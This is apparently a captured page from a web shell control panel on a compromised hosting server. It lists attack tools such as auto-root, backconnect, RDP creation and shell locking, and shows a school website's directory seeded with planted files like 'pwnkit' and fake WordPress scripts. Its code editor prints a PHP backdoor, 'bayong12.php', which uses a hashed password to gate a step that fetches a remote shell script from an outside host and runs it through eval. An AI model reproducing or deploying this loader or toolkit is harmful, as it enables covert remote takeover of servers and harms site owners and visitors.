Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.144.90.108
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
fchanna /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
pongkedo
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rwxr-xr-x
academic.php
10.42
KB
-rwxr-xr-x
addmission.php
1.76
KB
-rwxr-xr-x
bayong12.php
2.46
KB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rwxr-xr-x
config.php
625
B
-rw-r--r--
contact.php
1.8
KB
-rwxr-xr-x
error_log
311.48
MB
-rwxr-xr-x
favicon.ico
2.56
KB
-rwxr-xr-x
footer.php
6.31
KB
-rwxr-xr-x
gallery.php
1.54
KB
-rw-r--r--
header.php
11.03
KB
-rwxr-xr-x
index.php
22.19
KB
-rwxr-xr-x
news-coverage.php
1.63
KB
-rwxr-xr-x
ok.txt
21
B
-rw-r--r--
pedagogy.php
1.25
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rwxr-xr-x
robots.txt
404
B
-rw-r--r--
shining-star.php
8.56
KB
-rwxr-xr-x
sitemap.xml
530
B
-rw-r--r--
tc.php
3.14
KB
-rwxr-xr-x
theschool.php
4.28
KB
-rwxr-xr-x
toppers.php
5.37
KB
-rwxr-xr-x
ucen.php
66.39
KB
-rw-r--r--
wp-blog-header.php
4.57
KB
-rw-r--r--
wp-cron.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bayong12.php
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '1cf47db866f074b6c9875e367c21c05d'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; // Replace this with your cookie data } else { // Password is incorrect echo "Incorrect password. Please try again."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://shell.prinsh.com/Nathan/alfa.txt'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html> <head> <title>Login Admin</title> </head> <body> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>
Close